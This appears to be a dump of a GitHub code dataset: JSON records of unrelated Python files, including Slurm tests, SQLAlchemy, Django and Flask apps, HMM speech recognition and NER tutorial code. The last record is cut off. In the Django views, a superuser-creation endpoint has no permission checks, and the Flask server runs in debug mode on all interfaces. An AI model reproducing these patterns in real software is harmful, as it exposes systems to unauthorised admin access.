self.assertEqual(\n run_async(self.slurm_adapter.get_utilisation, drone_uuid=\"VM-1\"),\n min([self.cpu_ratio, self.memory_ratio]),\n )\n self.mock_async_run_command.assert_called_with(self.command)\n\n self.assertEqual(\n run_async(self.slurm_adapter.get_utilisation, drone_uuid=\"not_exists\"),\n 0.0,\n )\n\n def test_machine_meta_data_translation(self):\n self.assertEqual(\n AttributeDict(Cores=1, Memory=1000, Disk=1000),\n self.slurm_adapter.machine_meta_data_translation_mapping,\n )\n","repo_name":"stwunsch/tardis","sub_path":"tests/adapters_t/batchsystems_t/test_slurm.py","file_name":"test_slurm.py","file_ext":"py","file_size_in_byte":7781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"25032390579","text":"\"\"\"\nструктура таблиц для наглядности\nCREATE TABLE athelete(\n \"id\" integer primary key autoincrement,\n \"age\" integer,\n \"birthdate\" text,\n \"gender\" text,\n \"height\" real,\n \"name\" text,\n \"weight\" integer,\n \"gold_medals\" integer,\n \"silver_medals\" integer,\n \"bronze_medals\" integer,\n \"total_medals\" integer,\n \"sport\" text,\n \"country\" text);\nCREATE TABLE sqlite_sequence(name,seq);\nCREATE TABLE user(\n \"id\" integer primary key autoincrement,\n \"first_name\" text,\n \"last_name\" text,\n \"gender\" text,\n \"email\" text,\n \"birthdate\" text,\n \"height\" real);\n\"\"\"\n\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\nDB_PATH = \"sqlite:///sochi_athletes.sqlite3\"\nBase = declarative_base()\n\n\nclass User(Base):\n __tablename__ = 'user'\n\n id = sa.Column(sa.Integer, primary_key=True)\n first_name = sa.Column(sa.TEXT)\n last_name = sa.Column(sa.Text)\n gender = sa.Column(sa.Text)\n email = sa.Column(sa.Text)\n birthdate = sa.Column(sa.Text)\n height = sa.Column(sa.Float)\n\n\ndef connect_db():\n \"\"\"\n Устанавливает соединение к базе данных, создает таблицы, если их еще нет и возвращает объект сессии\n \"\"\"\n # создаем соединение к базе данных\n engine = sa.create_engine(DB_PATH)\n # создаем описанные таблицы\n Base.metadata.create_all(engine)\n # создаем фабрику сессию\n session = sessionmaker(engine)\n # возвращаем сессию\n return session()\n\n\ndef request_data():\n \"\"\"\n Запрашивает у пользователя данные и добавляет их в список users\n \"\"\"\n # запрашиваем у пользователя данные\n first_name = input(\"Введи своё имя: \")\n last_name = input(\"А теперь фамилию: \")\n gender = input(\"Пол: \")\n email = input(\"Адрес электронной почты: \")\n birthdat = input(\"День рождения, в формате ГГГГ-ММ-ДД: \")\n height = float(input(\"Рост в см, напр. 175: \"))\n # создаем нового пользователя\n user = User(\n first_name=first_name,\n last_name=last_name,\n gender=gender,\n email=email,\n birthdate=birthdat,\n height=height\n )\n # возвращаем созданного пользователя\n return user\n\n\ndef main():\n \"\"\"\n Осуществляет взаимодействие с пользователем, обрабатывает пользовательский ввод\n \"\"\"\n session = connect_db()\n\n user = request_data()\n # добавляем нового пользователя в сессию\n session.add(user)\n # сохраняем все изменения, накопленные в сессии\n session.commit()\n print(\"Спасибо, данные сохранены!\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"belousovromnik/B4.12","sub_path":"users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32890402584","text":"\"\"\"\n\"\"\"\n\nfrom __future__ import division\n\n\ndef get_toy_data():\n from learning.dataset import BarsData\n return BarsData(which_set=\"train\", n_datapoints=500)\n\ndef get_toy_model():\n from learning.models.rws import LayerStack\n from learning.models.sbn import SBN, SBNTop\n\n p_layers = [\n SBN( \n n_X=25,\n n_Y=10\n ),\n SBNTop(\n n_X=10,\n )\n ]\n q_layers = [\n SBN(\n n_X=10,\n n_Y=25,\n )\n ]\n model = LayerStack(\n p_layers=p_layers,\n q_layers=q_layers,\n )\n return model\n\n","repo_name":"jbornschein/reweighted-ws","sub_path":"learning/tests/toys.py","file_name":"toys.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"47"} +{"seq_id":"74354395661","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\ndef _take(ls):\n # List -> (Node, List)\n tmp = ls.next\n ls.next = None\n return (ls, tmp)\n\ndef merge_lists(l1, l2):\n head, tail = None, None\n # initialise head and tail\n if l1 and (not l2 or l1.val <= l2.val):\n head, l1 = _take(l1)\n elif l2 and (not l1 or l1.val > l2.val):\n head, l2 = _take(l2)\n tail = head\n # merge\n while l1 and l2:\n if l1.val <= l2.val:\n node, l1 = _take(l1)\n tail.next = node\n else: #l1.val > l2.val\n node, l2 = _take(l2)\n tail.next = node\n tail = tail.next\n if l1:\n tail.next = l1\n if l2:\n tail.next = l2\n return head\n\nclass Solution:\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n return merge_lists(l1, l2)\n","repo_name":"davll/practical-algorithms","sub_path":"LeetCode/21-merge_two_sorted_lists.py","file_name":"21-merge_two_sorted_lists.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16094037058","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .serializers import MyTokenObtainPairSerializer\nfrom rest_framework.permissions import IsAuthenticated,IsAdminUser\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom .models import CustomAccountManager\nfrom django.forms.models import model_to_dict\n\n\nclass MyTokenObtainPairView(TokenObtainPairView):\n serializer_class = MyTokenObtainPairSerializer\n# create user\nclass CreateUser(APIView):\n permission_classes = ()\n \n def post(self, request):\n try:\n dataReq = request.data \n temp = CustomAccountManager().create_user(\n dataReq[\"user_name\"]\n , dataReq[\"password\"]\n , is_dev = dataReq[\"is_dev\"]\n , email = dataReq[\"email\"]\n , company = dataReq[\"company\"]\n )\n if temp is None:\n response = \"User existed\"\n else:\n response = \"User Created 🙂\" \n return Response(response)\n except:\n response = \"Server error please contact admin\"\n return Response(response, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n# create super user\nclass CreateSuperUser(APIView):\n permission_classes = ()\n \n def post(self, request):\n # GET data example\n dataReq = request.data\n try:\n CustomAccountManager().create_superuser(dataReq[\"user_name\"], dataReq[\"password\"],is_dev = dataReq[\"is_dev\"] == \"true\")\n return Response(\"UserCreated\")\n except:\n response = \"Server error please contact admin\"\n return Response(response, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n \n \n ","repo_name":"dominhgiangbboy/django-nuxt-paranormal","sub_path":"back_end_project/fukakachi/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"71269959824","text":"from django import forms\n\nfrom .models import Menu, Item, Ingredient\n\n\nclass MenuForm(forms.ModelForm):\n class Meta:\n model = Menu\n exclude = ('created_date',)\n\n\nclass ChangeMenuForm(forms.ModelForm):\n \"\"\"form to create and change menu \"\"\"\n\n class Meta:\n model = Menu\n exclude = ('created_date',)\n items_field = forms.ModelMultipleChoiceField(\n queryset=Item.objects.all())\n\n def save(self):\n signup = forms.ModelForm.save(self)\n for item in self.cleaned_data['items_field']:\n signup.item_set.add(item)\n\n\nclass ItemEditForm(forms.ModelForm):\n \"\"\"form to edit item \"\"\"\n\n class Meta:\n model = Item\n exclude = ('chef', 'created_date')\n ingredients_field = forms.ModelMultipleChoiceField(\n queryset=Ingredient.objects.all())\n\n def save(self):\n signup = forms.ModelForm.save(self)\n for ingredient in self.cleaned_data['ingredients_field']:\n signup.item_set.add(ingredient)\n","repo_name":"Curtis-S/debug_project","sub_path":"menu/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1502979478","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val: int = 0, left: 'Node' = None, right: 'Node' = None, next: 'Node' = None):\n self.val = val\n self.left = left\n self.right = right\n self.next = next\n\"\"\"\n\nclass Solution:\n def connect(self, root: 'Optional[Node]') -> 'Optional[Node]':\n # 在从左到右遍历第N-1层的时候,我们就尽量把第N层的指针设置好,属于一个父节点的直接就可以设置,如果不属于同一个父节点,那么就设计相邻第N-1层相邻两个节点之间的处理。\n if root == None: return\n\n level_start = root\n cur = root\n while cur.left != None:\n cur.left.next = cur.right\n if cur.next == None:\n # Reach right end.\n tmp = level_start\n while tmp.next != None:\n tmp.right.next = tmp.next.left\n tmp = tmp.next\n cur = level_start.left\n level_start = cur\n else: \n cur = cur.next\n \n return root","repo_name":"LidaGuo1999/Coding_Solution","sub_path":"Leetcode/python/116-填充每个节点的下一个右侧节点指针.py","file_name":"116-填充每个节点的下一个右侧节点指针.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31976682138","text":"import flask\nimport sqlite3\n\nfrom flask import request\n\nfrom src.db_conn import DbManager\nfrom src import EuclideanDistanceScore as euc\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\ndb = DbManager(\"db_file/mydb\")\n\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return \"Selam Sanem\"\n\n@app.route('/login', methods=['POST', 'GET'])\ndef login():\n if request.method == 'POST':\n if valid_login(request.form['username'],\n request.form['password']):\n print({\"Login\":\"Successful\",\"user\":db.get_user_info(request.form['username']),\"gameinfo\":db.get_user_game_info(request.form['username'])})\n return {\"Login\":\"Successful\",\"user\":db.get_user_info(request.form['username']),\"gameinfo\":db.get_user_game_info(request.form['username'])}\n else:\n return {\"Login\":\"Failed\"}\n\n@app.route('/getuserinfo/', methods=['POST', 'GET'])\ndef getuserinfo(username):\n return db.get_user_info(username)\n\n@app.route('/gettestusers', methods=['POST', 'GET'])\ndef gettestusers():\n return {\"Users\":[\"umit\",\"gizem\",\"sanem\"]}\n\n@app.route('/getfriendsuggestion/', methods=['POST', 'GET'])\ndef getfriendsuggestion(username):\n user_data = db.get_user_game_interes()\n gamedatas = {}\n result=[]\n for data in user_data:\n if (data[0] is not None and data[1] is not None and data[2] is not None and data[3] is not None):\n user_score = int(data[3])\n user_name = data[0]\n user_level = int(data[2])\n game = data[1]\n gamedata = {\n user_name: {game: user_level, \"game\": int(game.replace(\"-\", \"\").replace(\" \", \"\").replace(\"'\", \"\"), 36)}}\n gamedatas.update(gamedata)\n friendlist = euc.topMatches(gamedatas,username, n=5)\n for friend in friendlist:\n user_info=db.get_user_game_info(str(friend[1]))\n result.append(\"Username:\"+user_info[\"username\"]+\" Game:\"+user_info[\"game\"]+\" Game Type:\"+user_info[\"gametype\"]+\" Game Level:\" +str(user_info[\"level\"]) )\n return {\"Users\":result}\n\n\n@app.route('/getusers', methods=['GET'])\ndef get_users():\n query= \"select * from users\"\n db.execute_query(query)\n return \"success\"\n\n@app.route('/adduser', methods=['GET', 'POST'])\ndef add_user():\n content = request.form\n if(db.add_user(content)):\n return \"Success\"\n else:\n return \"Failed, check if all fields exist\"\n@app.route('/addgame', methods=['GET', 'POST'])\ndef add_game():\n content = request.json\n if(db.add_game(content)):\n return {\"Result\":\"Success\"}\n else:\n return {\"Result\":\"Fail\"}\n\n\n@app.route('/addgametouser/', methods=['GET', 'POST'])\ndef addgametouser(username):\n content = request.json\n if (db.add_game_to_user(username,content)):\n return \"Success\"\n else:\n return \"Failed, check if all fields exist\"\n\n@app.route('/getusergameinfo/', methods=['GET', 'POST'])\ndef getusergameinfo(username):\n if (db.get_user_game_info(username)):\n return db.get_user_game_info(username)\n else:\n return {\"Result\":\"Failed\"}\n\n\ndef valid_login(username,password):\n result=db.get_username_password(username,password)\n if len(result)>0:\n return True\n else:\n return False\n\nif __name__ == \"__main__\":\n app.run(host= '0.0.0.0')","repo_name":"sanemeroglu/Gameify_server1","sub_path":"flask-server2/src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74832916302","text":"\nimport os\nimport sys\nimport matplotlib.pyplot as plt\nimport numpy as np\nN = int(sys.argv[1])\n\ngeneral_directory = \"results/general_algorithm/tables/\"\ngeneral_table = \"n_vs_time_general.txt\"\n\nspecial_directory = \"results/special_algorithm/tables/\"\nspecial_table = special_directory + \"n_vs_time_special.txt\"\n\nLU_directory = \"results/LU/tables/\"\nLU_table = LU_directory + \"n_vs_time_LU.txt\"\n\ngeneral_time = []\nspecial_time = []\nLU_time = []\nnumber_of_gridpoints = [int(10**i) for i in range(1,N+1)]\n\nfilepath = os.path.join(general_directory, general_table)\ninfile = open(filepath)\ninfile.readline()\nlines = infile.readlines()\nfor line in lines:\n numbers = line.split()\n general_time.append(float(numbers[-1]))\ninfile.close()\n\nwith open(special_table, \"r\") as infile:\n infile.readline()\n lines = infile.readlines()\n for line in lines:\n numbers = line.split()\n special_time.append(float(numbers[-1]))\n\nwith open(LU_table, \"r\") as infile:\n infile.readline()\n lines = infile.readlines()\n for line in lines:\n numbers = line.split()\n LU_time.append(float(numbers[-1]))\n\noutfilename = \"n_vs_time_all_algorithms.txt\"\nwith open(outfilename, \"w\") as outfile:\n outfile.write(\"n\" + \" \" + \"general\" + \" \" + \"special\" + \" \" + \"LU\" + \"\\n\")\n for n, general, special, lu in zip(number_of_gridpoints, general_time, special_time, LU_time):\n outfile.write(str(\"%.1E\" % n) + \" \" + str(\"%f\" % general) + \" \" + str(\"%f\" % special) + \" \" + str(\"%f\" % lu) + \"\\n\")\n\nresults_directory = \"~/Documents/skole/comphys/projects/project1/codes/results/\"\nos.system(\"mv\" + \" \" + outfilename + \" \" + results_directory)\n","repo_name":"benedibn/comphys","sub_path":"projects/project1/codes/create_benchmark_table.py","file_name":"create_benchmark_table.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29968473394","text":"import pynini\nfrom nemo_text_processing.text_normalization.zh.graph_utils import GraphFst,insert_space,NEMO_DIGIT,NEMO_CHAR\nfrom pynini.lib import pynutil\n\nclass Fraction(GraphFst):\n '''\n 1/5 -> tokens { fraction { numerator: \"1\" denominator: \"5\" } }\n '''\n def __init__(self, deterministic: bool = True, lm: bool = False):\n super().__init__(name=\"fraction\", kind=\"classify\", deterministic=deterministic)\n\n numerator = pynini.closure(NEMO_DIGIT,1) + pynutil.delete('/')\n denominator = pynini.closure(NEMO_DIGIT,1)\n graph = (\n pynutil.insert(\"numerator: \\\"\") \n + numerator \n + pynutil.insert(\"\\\"\") + insert_space \n + pynutil.insert(\"denominator: \\\"\") \n + denominator \n + pynutil.insert(\"\\\"\") \n )\n\n self.fst = self.add_tokens(graph).optimize()\n","repo_name":"dophist/textnorm","sub_path":"zh/nemo_text_processing/text_normalization/zh/taggers/fraction.py","file_name":"fraction.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"8152016646","text":"import librosa\nimport numpy as np\nimport os\nimport math\nfrom sklearn.cluster import KMeans\nimport hmmlearn.hmm\n\ndef get_mfcc(file_path):\n y, sr = librosa.load(file_path) # read .wav file\n hop_length = math.floor(sr*0.010) # 10ms hop\n win_length = math.floor(sr*0.025) # 25ms frame\n # mfcc is 12 x T matrix\n mfcc = librosa.feature.mfcc(\n y, sr, n_mfcc=12, n_fft=1024,\n hop_length=hop_length, win_length=win_length)\n # substract mean from mfcc --> normalize mfcc\n mfcc = mfcc - np.mean(mfcc, axis=1).reshape((-1,1)) \n # delta feature 1st order and 2nd order\n delta1 = librosa.feature.delta(mfcc, order=1)\n delta2 = librosa.feature.delta(mfcc, order=2)\n # X is 36 x T\n X = np.concatenate([mfcc, delta1, delta2], axis=0) # O^r\n # return T x 36 (transpose of X)\n return X.T # hmmlearn use T x N matrix\n\ndef get_class_data(data_dir):\n files = os.listdir(data_dir)\n mfcc = [get_mfcc(os.path.join(data_dir,f)) for f in files if f.endswith(\".wav\")]\n return mfcc\n\ndef clustering(X, n_clusters=10):\n kmeans = KMeans(n_clusters=n_clusters, n_init=50, random_state=0, verbose=0)\n kmeans.fit(X)\n print(\"centers\", kmeans.cluster_centers_.shape)\n return kmeans \n\nif __name__ == \"__main__\":\n class_names = [\"one\", \"two\", \"test_one\", \"test_two\"]\n dataset = {}\n for cname in class_names:\n print(f\"Load {cname} dataset\")\n dataset[cname] = get_class_data(os.path.join(\"data\", cname))\n\n # Get all vectors in the datasets\n all_vectors = np.concatenate([np.concatenate(v, axis=0) for k, v in dataset.items()], axis=0)\n print(\"vectors\", all_vectors.shape)\n # Run K-Means algorithm to get clusters\n kmeans = clustering(all_vectors)\n print(\"centers\", kmeans.cluster_centers_.shape)\n\n models = {}\n for cname in class_names:\n class_vectors = dataset[cname]\n # convert all vectors to the cluster index\n # dataset['one'] = [O^1, ... O^R]\n # O^r = (c1, c2, ... ct, ... cT)\n # O^r size T x 1\n dataset[cname] = list([kmeans.predict(v).reshape(-1,1) for v in dataset[cname]])\n hmm = hmmlearn.hmm.MultinomialHMM(\n n_components=6, random_state=0, n_iter=1000, verbose=True,\n startprob_prior=np.array([0.7,0.2,0.1,0.0,0.0,0.0]),\n transmat_prior=np.array([\n [0.1,0.5,0.1,0.1,0.1,0.1,],\n [0.1,0.1,0.5,0.1,0.1,0.1,],\n [0.1,0.1,0.1,0.5,0.1,0.1,],\n [0.1,0.1,0.1,0.1,0.5,0.1,],\n [0.1,0.1,0.1,0.1,0.1,0.5,],\n [0.1,0.1,0.1,0.1,0.1,0.5,],\n ]),\n )\n if cname[:4] != 'test':\n X = np.concatenate(dataset[cname])\n lengths = list([len(x) for x in dataset[cname]])\n print(\"training class\", cname)\n print(X.shape, lengths, len(lengths))\n hmm.fit(X, lengths=lengths)\n models[cname] = hmm\n print(\"Training done\")\n\n print(\"Testing\")\n for true_cname in class_names:\n for O in dataset[true_cname]:\n score = {cname : model.score(O, [len(O)]) for cname, model in models.items() if cname[:4] != 'test' }\n print(true_cname, score)\n\n","repo_name":"tqlong/voice-class","sub_path":"speech_recognition.py","file_name":"speech_recognition.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"19718330614","text":"#!/usr/bin/env python\n\nfrom argparse import ArgumentParser\nfrom netCDF4 import Dataset as CDF\n \n# Set up the option parser\nparser = ArgumentParser()\nparser.description = '''Script adds CF-conforming mapping variable for EPSG:26710.'''\nparser.add_argument(\"FILE\", nargs=1)\noptions = parser.parse_args()\nargs = options.FILE\n\nnc = CDF(args[0], 'a')\n\nif not \"mapping\" in nc.variables.keys():\n mapping = nc.createVariable(\"mapping\", 'c')\nelse:\n mapping = nc.variables(\"mapping\")\n \nmapping.longitude_of_central_meridian = -123.0\nmapping.false_easting = 500000.0\nmapping.false_northing = 0.0\nmapping.grid_mapping_name = \"transverse_mercator\"\nmapping.inverse_flattening = 294.978698213898\nmapping.latitude_of_projection_origin = 0.0\nmapping.scale_factor_at_central_meridian = 0.9996\nmapping.semi_major_axis = 6378206.4\nmapping.unit = \"metre\"\n\nfor var in nc.variables.keys():\n if (nc.variables[var].ndim >= 2 and var not in ['lat', 'lon', 'lat_bnds', 'lon_bnds', 'lat_bounds', 'lon_bounds']):\n nc.variables[var].grid_mapping = \"mapping\"\n\nnc.close()\n","repo_name":"amandersillinois/pism-olympics","sub_path":"scripts/add_grid_mapping.py","file_name":"add_grid_mapping.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"34785001715","text":"from textblob import TextBlob, Word\nfrom spellchecker import SpellChecker\nfrom django.shortcuts import render, redirect\nfrom .forms import CheckForm\nfrom .models import Check\n\n\ndef text_views(request):\n if request.method == 'POST':\n form = CheckForm(request.POST)\n\n if form.is_valid():\n form.save()\n # return redirect('result')\n else:\n form = CheckForm()\n return render(request, 'check.html', {'form': form})\n\n\ndef result_views(request):\n qs = Check.objects.latest('time')\n\n tb = TextBlob(qs.text)\n spell = SpellChecker()\n res = {}\n ck = []\n for word in tb.words:\n word = word.lower()\n w = Word(word)\n # res.update({word})\n # if word != word.correct() and word != spell.correction(word):\n # res.update({word: spell.candidates(word)})\n\n val = w.spellcheck()\n\n if len(val) == 1:\n if word != val[0][0]:\n res[word] = [val[0][0]]\n else:\n if val[0][1] == 0.0:\n res[word] = ['Irrelevant spelling.']\n else:\n for it in val:\n ck.append(it[0])\n res[word] = ck\n ck = []\n\n return render(request, 'result.html', {'queryset': res})\n","repo_name":"na5imuzzaman/SpellChecker","sub_path":"checking/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72877095183","text":"\nimport turtle\nfrom turtle import *\nimport time\n\nturtle.title(\"LOVE\")\nttl = turtle.Turtle()\n\ndef curve():\n for i in range(200):\n ttl.right(1)\n ttl.forward(1)\n print(i)\n\ndef heart():\n ttl.fillcolor('red')\n ttl.begin_fill()\n ttl.left(140)\n ttl.forward(113)\n curve()\n ttl.left(120)\n curve()\n ttl.forward(112)\n ttl.end_fill()\n\ndef txt():\n ttl.up()\n ttl.setpos(-75, 78)\n ttl.down()\n ttl.color('white')\n ttl.write(\"SAD Happy\", font=(\n \"Verdana\", 16, \"bold\"))\n\nheart()\ntxt()\n\nttl.penup()\nttl.goto(50, 150)\nttl.pendown()\n\ndef drawing_rose(turtle, radius):\n heading = turtle.heading()\n turtle.circle(radius, 60)\n turtle.left(120)\n turtle.circle(radius, 60)\n turtle.setheading(heading)\nfor _ in range(9):\n ttl.color(\"black\", \"white\")\n ttl.begin_fill()\n drawing_rose(ttl, 60)\n ttl.left(360 / 9)\n ttl.end_fill()\n\n\ntime.sleep(1000)\n\n# To hide turtle\n# ttl.ht()","repo_name":"TMexe404/LatihanTurtle","sub_path":"main1.py","file_name":"main1.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"41446361761","text":"import numpy\nimport math\nfrom .config import chunk_size, sampling_rate\nfrom .EffectFFTFilter import CreateLowCutFilter, CreateHighCutFilter\n\nclass CreateDelay:\n \"\"\"Creating a Delay audio-effect class/device.\n\n Is overloaded with basic settings.\n This class introduces no latency\n\n Parameters\n ----------\n time_in_ms : int or float\n Sets the delay-time in milliseconds.\n feedback_loops : int or float\n Sets the amount of repetitions of the delay.\n lowcut_filter_frequency : int or float\n The frequency of the audio filter, if use_lowcut_filter is set to True\n highcut_filter_frequency : int or float\n The frequency of the audio filter, if use_highcut_filter is set to True\n use_lowcut_filter : bool\n If use_lowcut_filter is set to True, it will apply a lowcut to the processed input array.\n use_highcut_filter : bool\n If use_highcut_filter is set to True, it will apply a highcut to the processed input array.\n wet : bool\n If set to True it will just return the delay and not mix it with the original signal.\n Used for parallel processing.\n \"\"\"\n def __init__(self,time_in_ms=500,feedback_loops=2,lowcut_filter_frequency=40,highcut_filter_frequency=12000,use_lowcut_filter=False,use_highcut_filter=False,wet=False):\n self.time_in_samples = numpy.int(time_in_ms*(sampling_rate/1000))\n self.wet = wet\n self.max_samples = self.time_in_samples*(feedback_loops+2)\n self.delay_buffer = numpy.zeros(int(self.max_samples), dtype=\"float32\")\n self.feedback_ramp = numpy.linspace(0.5,0.1,num=feedback_loops,dtype=\"float32\")\n self.use_lowcut_filter = use_lowcut_filter\n self.use_highcut_filter = use_highcut_filter\n self.LowCutFilter = CreateLowCutFilter(lowcut_filter_frequency)\n self.HighcutFilter = CreateHighCutFilter(highcut_filter_frequency)\n\n def apply(self,float32_array_input):\n \"\"\"Applying the 3 Band FFT EQ to a numpy-array.\n\n Parameters\n ----------\n float32_array_input : float\n The array, which the effect should be applied on.\n\n Returns\n -------\n float\n The processed array, should be the exact same size as the input array\n\n \"\"\"\n if (self.use_lowcut_filter == True):\n float32_array_input = self.LowCutFilter.applylowcutfilter(float32_array_input)\n if (self.use_highcut_filter == True):\n float32_array_input = self.HighcutFilter.applyhighcutfilter(float32_array_input)\n\n for counter in range(len(self.feedback_ramp)):\n processed_input = float32_array_input * self.feedback_ramp[counter]\n start_index = self.time_in_samples*(counter+1)\n end_index = (self.time_in_samples*(counter+1))+len(float32_array_input)\n self.delay_buffer[start_index:end_index] += processed_input\n\n if (self.wet == False):\n float32_array_input += self.delay_buffer[0:len(float32_array_input)]\n else:\n float32_array_input = self.delay_buffer[0:len(float32_array_input)]\n\n self.delay_buffer = self.delay_buffer[len(float32_array_input):len(self.delay_buffer)]\n self.delay_buffer = numpy.append(self.delay_buffer,numpy.zeros(len(float32_array_input),dtype=\"float32\"))\n\n return(float32_array_input)\n","repo_name":"ArjaanAuinger/pyaudiodsptools","sub_path":"pyAudioDspTools/EffectDelay.py","file_name":"EffectDelay.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":179,"dataset":"github-code","pt":"47"} +{"seq_id":"20308040568","text":"from nltk import word_tokenize, pos_tag, ne_chunk\n\nsentence = \"James is working at Disney in London\"\n# 토큰화 후 품사 태깅\ntokenized_sentence = pos_tag(word_tokenize(sentence))\nprint(tokenized_sentence)\n\n'''\n[('James', 'NNP'), ('is', 'VBZ'), ('working', 'VBG'), \n('at', 'IN'), ('Disney', 'NNP'), ('in', 'IN'), ('London', 'NNP')]\n'''\n\n# 개체명 인식\nner_sentence = ne_chunk(tokenized_sentence)\nprint(ner_sentence)\n\n'''\n(S\n (PERSON James/NNP)\n is/VBZ\n working/VBG\n at/IN\n (ORGANIZATION Disney/NNP)\n in/IN\n (GPE London/NNP))\n'''\n\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport urllib.request\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.utils import to_categorical\nfrom sklearn.model_selection import train_test_split\n\n# 전처리 수행\nurllib.request.urlretrieve(\n \"https://raw.githubusercontent.com/ukairia777/tensorflow-nlp-tutorial/main/12.%20Sequence%20Labeling/dataset/train.txt\",\n filename=\"train.txt\")\n\nf = open('train.txt', 'r')\ntagged_sentences = []\nsentence = []\n\nfor line in f:\n if len(line) == 0 or line.startswith('-DOCSTART') or line[0] == \"\\n\":\n if len(sentence) > 0:\n tagged_sentences.append(sentence)\n sentence = []\n continue\n splits = line.split(' ') # 공백을 기준으로 속성을 구분한다.\n splits[-1] = re.sub(r'\\n', '', splits[-1]) # 줄바꿈 표시 \\n을 제거한다.\n word = splits[0].lower() # 단어들은 소문자로 바꿔서 저장한다.\n sentence.append([word, splits[-1]]) # 단어와 개체명 태깅만 기록한다.\n\n# 전체 샘플 개수를 확인해보겠습니다.\nprint(\"전체 샘플 개수: \", len(tagged_sentences))\n\n# 훈련을 위한 훈련 데이터에서 단어에 해당되는 부분과 개체명 태깅 정보에 해당되는 부분을 분리\nsentences, ner_tags = [], []\nfor tagged_sentence in tagged_sentences: # 14,041개의 문장 샘플을 1개씩 불러온다.\n sentence, tag_info = zip(*tagged_sentence) # 각 샘플에서 단어들은 sentence에 개체명 태깅 정보들은 tag_info에 저장.\n sentences.append(list(sentence)) # 각 샘플에서 단어 정보만 저장한다.\n ner_tags.append(list(tag_info)) # 각 샘플에서 개체명 태깅 정보만 저장한다.\n\n# 각 문장 샘플에 대해서 단어는 sentences에 태깅 정보는 ner_tags에 저장\nprint('첫번째 샘플의 문장 :', sentences[0])\nprint('첫번째 샘플의 레이블 :', ner_tags[0])\n\n# 전체 데이터의 길이 분포 확인\nprint('샘플의 최대 길이 : %d' % max(len(sentence) for sentence in sentences))\nprint('샘플의 평균 길이 : %f' % (sum(map(len, sentences)) / len(sentences)))\nplt.hist([len(sentence) for sentence in sentences], bins=50)\nplt.xlabel('length of samples')\nplt.ylabel('number of samples')\nplt.show()\n\n# 샘플들의 길이가 대체적으로 0~40의 길이를 가지며,\n# 특히 0~20의 길이를 가진 샘플이 상당한 비율을 차지하는 것을 보여줍니다.\n# 길이가 가장 긴 샘플의 길이는 113입니다.\n\n# 케라스 토크나이저를 통해서 정수 인코딩을 진행합니다.\n# 이번에는 문장 데이터에 있는 모든 단어를 사용하지 않고 높은 빈도수를 가진 상위 약 4,000개의 단어만을 사용합니다.\nvocab_size = 4000\nsrc_tokenizer = Tokenizer(num_words=vocab_size, oov_token='OOV')\nsrc_tokenizer.fit_on_texts(sentences)\n\ntar_tokenizer = Tokenizer()\ntar_tokenizer.fit_on_texts(ner_tags)\n\n# 문장 데이터에 대해서는 src_tokenizer를, 레이블에 해당되는 개체명 태깅 정보에 대해서는 tar_tokenizer를 사용합니다.\ntag_size = len(tar_tokenizer.word_index) + 1\nprint('단어 집합의 크기 : {}'.format(vocab_size))\nprint('개체명 태깅 정보 집합의 크기 : {}'.format(tag_size))\n\n# 정수 인코딩을 수행합니다.\n# 문장 데이터에 대해서 정수 인코딩이 수행된 결과는 X_train,\n# 개체명 태깅 데이터에 대해서 정수 인코딩이 수행된 결과는 y_train에 저장되었습니다.\nX_train = src_tokenizer.texts_to_sequences(sentences)\ny_train = 